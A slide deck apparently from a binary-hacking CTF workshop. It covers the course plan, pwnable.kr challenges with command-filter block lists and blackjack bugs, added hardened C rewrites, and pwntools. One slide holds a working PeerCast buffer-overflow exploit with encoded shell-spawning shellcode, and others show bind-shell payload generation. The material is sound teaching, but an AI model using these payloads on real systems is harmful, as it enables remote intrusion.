Hacker?

../images/trivial_question.jpg

Hacker?

../images/trivial_answer.jpg

Prosa's binary hacking workshop

Tonight's goals:

  • To introduce the topics of the following evenings
  • To introduce the software we will be using
  • To solve a couple of hacker challenges
  • To introduce pwntools

Prosa's binary hacking workshop

Purpose of the workshop:

To become able to solve CTF challenges that involve programs in binary form

ProsaCTF 2014

../images/ctf2014_teams.png

ProsaCTF 2014

../images/ctf2014_crackme.png

ProsaCTF 2014

../images/ctf2014_bof.png

ProsaCTF 2014

../images/ctf2014_trampolining.png

ProsaCTF 2014

../images/ctf2014_ret2libc.png

Requirements for participation

None! We are here to learn. But the following will help:

  • Linux command line
  • Programming in Python
  • Programming in or reading C
  • Interest in system architecture and operating systems

Contents day 1 - Reverse Engineering

  • Tools
  • i386 assembly
  • Compiler-generated code
  • Calling conventions
  • Stack layout and contents

Contents day 2 - Exploitation

  • Stack based buffer overflows
  • Using the GNU debugger
  • Using pwntools during exploit development
  • Bypassing ASLR
  • Bypassing stack canaries

Note
Vulnerability (sårbarhed) = a bug in software that affects the security of that software. Exploit = software that uses a vulnerability to achieve some goal that the vulnerable software did not intend.

Contents day 3 - Shellcoding

  • Developing shellcode for i386/Linux
  • Developing with pwntools
  • Typical challenges during shellcoding

Contents day 4 - Advanced Exploitation

  • Format string vulnerabilities
  • Arbitrary read/write primitives
  • Info leaks
  • GOT overwrites
  • Bypassing no-execute via ret2libc
  • Bypassing no-execute via Return Oriented Programming

Contents day 5 - Final exam/CTF

../images/CTF.png

Software used in the workshop

On your machine:

Fetch the virtual machine

$ git clone https://github.com/RobertLarsen/ProsaWorkshop.git

Start the virtual machine

$ cd ProsaWorkshop
$ vagrant up

Stop the virtual machine

$ cd ProsaWorkshop
$ vagrant suspend

Update the virtual machine

$ cd ProsaWorkshop
$ git pull
$ vagrant destroy -f
$ vagrant up

Connect to the virtual machine

Either:

$ cd ProsaWorkshop
$ vagrant ssh

Or (user=vagrant password=vagrant):

../images/putty.png

Wargames - Over The Wire

Wargames - VulnHub

Wargames - Smash The Stack

Wargames - Microcorruption

Wargames - pwnable.kr

Wargames - pwnable.tw

Wargames - ctftime

Wargames - CTF Repository

pwnable.kr - Toddler’s Bottle - cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

pwnable.kr - Toddler’s Bottle - cmd1

#include <stdio.h>
#include <stdlib.h>   /* putenv(), system() */
#include <string.h>

/* Substring blocklist: any hit rejects the whole command */
int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        /* PATH is replaced so that bare command names do not resolve */
        putenv("PATH=/fuckyouverymuch");
        if(filter(argv[1])) return 0;
        /* the argument that passed the filter is handed to /bin/sh -c */
        system( argv[1] );
        return 0;
}

pwnable.kr - Toddler’s Bottle - cmd2

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

pwnable.kr - Toddler’s Bottle - cmd2

#include <stdio.h>
#include <stdlib.h>   /* putenv(), system() */
#include <string.h>

/* Substring blocklist, extended from cmd1: any hit rejects the whole command */
int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
/* Overwrites every environment string in place with zeros */
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    /* PATH is set after the wipe, so bare command names do not resolve */
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    /* the argument that passed the filter is handed to /bin/sh -c */
    system( argv[1] );
    return 0;
}
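Both cmd1 and cmd2 hand a user-controlled string to system(), which means a shell, PATH lookup and shell syntax all sit between the filter and the program that eventually runs. The following is an added example, not part of the challenge code, of the allow-list design a defender would use instead: a fixed table maps a few permitted command names to absolute paths (the names and paths are assumptions for the example), and the program is started directly with execve() under a fixed environment, so no shell is involved and a blocklist is not needed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allow-list: command name -> absolute path (paths assumed for the example). */
static const struct { const char *name; const char *path; } allowed[] = {
    { "ls",   "/bin/ls"   },
    { "echo", "/bin/echo" },
    { "true", "/bin/true" },
};

/* Returns the absolute path for an allowed command name, or NULL. */
const char *resolve_allowed(const char *cmd) {
    size_t i;
    if (cmd == NULL) return NULL;
    for (i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(cmd, allowed[i].name) == 0)
            return allowed[i].path;
    return NULL;
}

/* Runs an allowed command with the given argv (argv[0] is the command name).
 * No shell is involved, so "sh", backticks or "/" inside arguments are just
 * bytes passed to the program. Returns the child's exit status, or -1 when
 * the command is not allowed or cannot be started. */
int run_allowed(char *const argv[]) {
    const char *path = resolve_allowed(argv[0]);
    pid_t pid;
    int status;
    if (path == NULL) return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* fixed, minimal env */
        execve(path, argv, envp);
        _exit(127);                                          /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[]) {
    if (argc < 2) { fprintf(stderr, "usage: %s cmd [args...]\n", argv[0]); return 2; }
    int rc = run_allowed(argv + 1);
    if (rc < 0) fprintf(stderr, "command not permitted\n");
    return rc < 0 ? 1 : rc;
}
```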

pwnable.kr - Toddler’s Bottle - blackjack

Hey! check out this C implementation of blackjack game! I found it online

I like to give my flags to millionaires.

how much money you got?

Running at : nc pwnable.kr 9009

pwnable.kr - Toddler’s Bottle - blackjack - Vulnerability 1

All calls to rand():

// Line 229: reseeded from the current second before every draw,
// so the card depends only on the time of the call
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Line 304
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Line 374
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Line 444
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;

// Line 514
srand((unsigned) time(NULL)); //Generates random seed for rand() function
random_card = rand()%4+1;

// Line 639
srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
z=rand()%13+1;
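To make the first vulnerability concrete, here is an added example (not the challenge's code): the clock-seeded draw is written as a function of its seed, which shows that two draws in the same second return the same card, next to a replacement that reads the card from /dev/urandom with rejection sampling so the result is neither predictable nor biased by the modulo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* The challenge's draw: reseed, then rand()%13+1. Written as a function of
 * the seed to make the point visible: the card is fully determined by the
 * seed, and the seed is the current second. */
int card_from_seed(unsigned seed) {
    srand(seed);
    return rand() % 13 + 1;
}

/* Replacement: one byte from the kernel CSPRNG via /dev/urandom, mapped to
 * 1..13 by rejection sampling (256 % 13 == 9, so bytes 247..255 are
 * rejected to keep every card equally likely). Returns 0 on read failure. */
int draw_card_secure(void) {
    FILE *f = fopen("/dev/urandom", "rb");
    unsigned char b;
    if (f == NULL) return 0;
    do {
        if (fread(&b, 1, 1, f) != 1) { fclose(f); return 0; }
    } while (b >= 256 - 256 % 13);
    fclose(f);
    return b % 13 + 1;
}

int main(void) {
    unsigned now = (unsigned) time(NULL);
    int first = card_from_seed(now), second = card_from_seed(now);
    printf("clock-seeded card drawn twice this second: %d, %d\n", first, second);
    printf("urandom card: %d\n", draw_card_secure());
    return 0;
}
```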

pwnable.kr - Toddler’s Bottle - blackjack - Vulnerability 2

// Line 721
int betting() //Asks user amount to bet
{
    printf("\n\nEnter Bet: $");
    scanf("%d", &bet);

    if (bet > cash) //If player tries to bet more money than player has
    {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet; // the re-entered bet is returned without being checked against cash
    }
    else return bet;
} // End Function

pwnable.kr - Toddler’s Bottle - blackjack - Vulnerability 3

// Line 28
int bet; // signed, and never checked for being negative

// Line 723
printf("\n\nEnter Bet: $");
scanf("%d", &bet);

// If you win
cash = cash+bet;

// If you lose
cash = cash - bet; // a negative bet turns a loss into a gain
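A hardened replacement for betting() that covers both vulnerability 2 and vulnerability 3, added as an example and not the challenge's code: the bet is parsed with strtol rather than scanf, rejected unless it is a whole number in 1..cash, and the same check is applied on every prompt instead of only the first one.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parses one bet from text and validates it against the player's cash.
 * Accepts only a whole number in 1..cash; rejects non-numbers, trailing
 * junk, overflow, zero, negatives (which would turn "cash - bet" into a
 * gain) and anything above cash. Returns 1 and stores the bet on success. */
int parse_bet(const char *input, int cash, int *bet_out) {
    char *end;
    long v;
    if (input == NULL || bet_out == NULL) return 0;
    errno = 0;
    v = strtol(input, &end, 10);
    if (end == input || errno == ERANGE) return 0;   /* not a number / overflow */
    while (*end == ' ' || *end == '\n') end++;       /* allow trailing whitespace */
    if (*end != '\0') return 0;                       /* trailing junk */
    if (v < 1 || v > cash) return 0;                  /* range check, every time */
    *bet_out = (int) v;
    return 1;
}

/* Re-prompting loop: unlike the original betting(), a second attempt is
 * validated exactly like the first. Returns 0 on EOF (no bet placed). */
int betting_checked(int cash) {
    char line[64];
    int bet;
    for (;;) {
        printf("\nEnter Bet (1-%d): $", cash);
        if (fgets(line, sizeof line, stdin) == NULL) return 0;
        if (parse_bet(line, cash, &bet)) return bet;
        printf("\nInvalid bet.");
    }
}

int main(void) {
    int cash = 500;
    int bet = betting_checked(cash);
    printf("\nBet accepted: $%d of $%d\n", bet, cash);
    return 0;
}
```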

pwnable.kr - Toddler’s Bottle - lotto

Mommy! I made a lotto program for my homework.

do you want to play?

ssh lotto@pwnable.kr -p2222 (pw:guest)

pwntools - Why not Metasploit?

vagrant@localhost:~$ time shellcraft -f r amd64.linux.bindsh 7777 >/dev/null

 real    0m0.687s
 user    0m0.241s
 sys     0m0.320s
vagrant@localhost:~$ time msfvenom -p linux/x64/shell_bind_tcp LPORT=7777 >/dev/null 2>&1

 real    0m6.595s
 user    0m1.928s
 sys     0m4.146s

pwntools - Why not Metasploit?

vagrant@localhost:~$ find .repositories/metasploit-framework/modules/exploits/linux -name '*.rb' | xargs wc -l | sort -nr | tail -n 1
    67 .repositories/metasploit-framework/modules/exploits/linux/http/peercast_url.rb

pwntools - Why not Metasploit?

#!/usr/bin/env python2

from pwn import *
import sys

#Generated with:
#shellcraft i386.linux.findpeersh | msfvenom --encoder x86/shikata_ga_nai --bad-chars '\x00\x0a\x0d\x20\x2f\x3d\x3b' --arch x86 --platform linux --format python
buf =  ""
buf += "\xbd\xf4\x6e\x99\x72\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x10\x83\xee\xfc\x31\x6e\x10\x03\x6e\x10\x16"
buf += "\x9b\xf3\x8d\xbc\x63\x8d\x97\x1b\x32\xe7\x31\xc3\x8c"
buf += "\x7a\xf1\xd7\xf0\xef\x0e\x77\x3c\x6f\x8b\xb7\xdf\x2a"
buf += "\xe1\xda\xa9\x38\x63\x27\xf3\xf7\x1e\x18\x5b\xc5\x5f"
buf += "\x13\xa3\xbf\x37\xb3\x7c\x6f\xe7\x30\xeb\x40\x95\xdf"
buf += "\x85\x17\xba\x2e\x93\x42\x36\x08\xba\x5e\xc8"

r = remote(sys.argv[1], 80)
r.send('GET /stream/?' + 'A' * 780 + p32(0x080922f7) + buf + '\r\n\r\n')
r.interactive()

pwntools

Intro time

Self-study - Video

Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration http://www.opensecuritytraining.info/IntroX86.html (12:08:24)

Introduction To Reverse Engineering Software http://www.opensecuritytraining.info/IntroductionToReverseEngineering.html (6:47:55)

Introduction To Software Exploits http://www.opensecuritytraining.info/Exploits1.html (9:38:54)